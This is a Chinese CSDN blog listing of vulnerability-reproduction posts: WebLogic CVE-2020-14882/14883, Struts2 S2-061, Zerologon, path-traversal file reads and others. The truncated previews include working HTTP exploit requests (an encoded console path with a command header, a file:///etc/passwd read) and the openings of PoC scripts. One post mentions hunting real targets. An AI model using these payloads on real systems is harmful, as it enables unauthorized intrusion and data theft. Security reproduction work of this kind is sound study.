![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
环境复现
ATOM_123
这个作者很懒,什么都没留下…
展开
-
S2-061(CVE-2020-17530)
环境:https://github.com/vulhub/vulhub/tree/master/struts2/s2-061POC:POST /index.action HTTP/1.1Host: 192.168.1.107:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53原创 2020-12-15 10:07:35 · 249 阅读 · 0 评论 -
CVE-2020-10977复现过程
老规矩上一下漏洞详情漏洞详情:GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 GitLab(企业版和社区版)12.9之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。POC:#!/usr/bin/env python3import sysimport jso.原创 2020-11-30 16:12:49 · 1732 阅读 · 2 评论 -
CVE -2020-13942 (Apache Unomi 远程代码执行漏洞)复现
一、漏洞描述:Apache Unomi是一个Java开源客户数据平台,这是一个Java服务器,旨在管理客户,潜在顾客和访问者的数据,并帮助个性化客户体验。Unomi可用于在非常不同的系统(例如CMS,CRM,问题跟踪器,本机移动应用程序等)中集成个性化和配置文件管理。在Apache Unomi 1.5.1版本之前,攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码,漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞..原创 2020-11-24 15:42:44 · 943 阅读 · 0 评论 -
CVE-2020-13957|Apache Solr ConfigSet API未授权上传漏洞
下载CVE-2020-13957影响范围: Apache Solr 6.6.0 to 6.6.5、7.0.0 to 7.7.3、8.0.0 to 8.6.2官方下载地址:Apache-Solr,本次漏洞复现下载影响范围内的8.0.0,解压既用。不挂代理下载实在太慢,于是我就上传了一份:https://download.csdn.net/download/weixin_39811856/13162062启动该漏洞需要以cloud模式运行Solr,同时Solr-API不能开启认证进入solr原创 2020-11-23 18:21:28 · 395 阅读 · 0 评论 -
CVE-2020-11989:Apache Shiro权限绕过复现
漏洞概述Apache Shiro 1.5.3之前的版本中,当将Apache Shiro与Spring动态控制器一起使用时,精心编制的请求可能会导致绕过身份验证影响版本Apache Shiro < 1.5.3环境搭建项目地址:https://download.csdn.net/download/weixin_39811856/13129895/test/需要登录后才可访问,未登录访问则会自动跳转:但是当访问/;/test时便可以绕过shiro认证查看需要登录认.原创 2020-11-20 14:04:18 · 1707 阅读 · 1 评论 -
CVE-2020-14750脚本编辑时遇到的问题
遇到了一个问题,首先贴上POCPOST /console/css/%252e%252e%252fconsole.portal HTTP/1.1Host: 172.16.242.134:7001cmd: chcp 65001&&whoami&&ipconfigUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85...原创 2020-11-11 17:51:22 · 1004 阅读 · 0 评论 -
CVE-2020-14882有回显payload
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1Host: 192.168.146.188:7001cmd: chcp 65001&&whoami&&ipconfigUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safa...原创 2020-11-11 14:33:16 · 608 阅读 · 0 评论 -
[CVE-2020-14882] Oracle WebLogic Server身份验证绕过
/console/css/%252e%252e%252fconsole.portal原创 2020-11-10 14:45:45 · 423 阅读 · 0 评论 -
CVE-2020-14883验证
[CVE-2020-14883] Oracle WebLogic Server认证的远程代码执行(RCE)基于windows的受攻击对象:tangosol.coherence.mvel2.sh.ShellSession()POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1Host: vulnerablehost:7001Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 ..原创 2020-11-10 13:38:42 · 3368 阅读 · 1 评论 -
CVE-2020-14882 weblogic 未授权命令执行复现及分析
简介该漏洞通过HTTP协议进行利用,远程且未经授权的攻击者可以直接在服务端执行任意代码,获取系统权限。环境搭建windows server 2012weblogic 12通过宽字节安全的分析来看(调试源码):http://<target>/console/console.portal?_nfpb=true&_pageLabel=HomePage1&handle=java.lang.String("ahihi")...原创 2020-10-30 10:52:21 · 943 阅读 · 0 评论 -
Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)复现
一、漏洞简介:ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。二、影响范围:Thinkadmin版本小于 ≤ 2020.08.03.01三、漏洞复现:利用POC去打(burp直接放包不能成功回去.原创 2020-10-29 09:36:08 · 863 阅读 · 1 评论 -
CVE-2020-16898 Windows tcp/ip远程代码执行漏洞复现以及分析
受影响版本Windows 10 Version 1709 for 32-bit Systems Windows 10 Version 1709 for ARM64-based Systems Windows 10 Version 1709 for x64-based Systems Windows 10 Version 1803 for 32-bit Systems Windows 10 Version 1803 for ARM64-based Systems Windows 10 Versi原创 2020-10-27 15:30:48 · 915 阅读 · 0 评论 -
CVE-2020-1472 域内提权复现
1.利用流程漏洞利用流程如下:1、 置空域控保存在AD中的密码2、 获取域控用户HASH3、通过获取到的管理员HASH得到一个SHELL2.安装最新的impacket:https://github.com/SecureAuthCorp/impacket注意:不要下载tags里面的,tags里面还是3月份的!3.漏洞利用:1)置空(置空的不是管理员账号密码)2)使用空密码dump域控上的hash如图:WIN-I0E7JQ4II7A$用户hash已被替..原创 2020-09-22 17:23:51 · 465 阅读 · 0 评论 -
泛微云桥任意文件读取漏洞复现[09/18]
1.老规矩,搜寻目标机器(xpath用起来确实很方便)2.根据网上的POC试试:GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1User-Agent: curl/7.29.0Host: xxxxxAccept: */*3.根据收集到的IP,手动是真滴麻烦,写个小脚本再筛选一遍:发现这个好像有戏,没有/etc/passwd,并且还是原创 2020-09-18 15:36:30 · 1371 阅读 · 2 评论 -
华硕RT-N13 QIS_wizard.htm 任意密码绕过
影响产品:Asus Routers (DSL-RT-N13 , DSL-N14U B1)漏洞复现: 1、查找目标机器 2、测试POC3、登录验证原创 2020-09-04 15:28:25 · 311 阅读 · 0 评论 -
D-link DIR-610 CVE-2020-9376复现
漏洞编号:CVE-2020-9376漏洞原理:D-Link DIR-610设备允许通过SERVICES = DEVICE.ACCOUNT%0AAUTHORIZED_GROUP = 1到getcfg.php进行信息披露。注意:此漏洞仅影响维护者不再支持的产品。漏洞复现:...原创 2020-09-02 14:18:27 · 879 阅读 · 0 评论 -
深信服EDR任意用户登录0day检测
import sysimport requestsimport argparsedef check_bypass(url): if '://' not in url: target = 'https://%s' % url if ':443' in url else 'https://%s' % url else: target = url target=target+r"/ui/login.php?user=admin" resp.原创 2020-08-20 12:38:12 · 852 阅读 · 0 评论 -
实战靶场整理
0x00 前言在学习渗透测试的过程中,光学理论知识是不够的,还需要结合实战来进行学习。但是国家法律是不允许我们对互联网上的web站在未授权的情况下进行渗透测试的,所以我们只能通过自己搭建环境来进行学习。下面给大家分享一些靶场,免得大家再去寻找。0x01Vulnerable Web ApplicationsBadStore http://www.badstore.net/ BodgeIt Store http://code.google.com/p/bodgeit/ Butt.原创 2020-07-22 10:35:41 · 2087 阅读 · 0 评论 -
CVE-2020-8840复现
0x00 漏洞概述FFasterXML/jackson-databind是一个用于JSON和对象转换的Java第三方库,可将Java对象转换成json对象和xml文档,同样也可将json对象转换成Java对象。此次漏洞中攻击者可利用xbean-reflect的利用链触发JNDI远程类加载从而达到远程代码执行。0x01 环境搭建搭建一个web服务器,我们采用python3在web服务器目录放上已经编译好的恶意类恶意文件内容为:启动ldap服务 这...原创 2020-07-01 17:50:23 · 2981 阅读 · 0 评论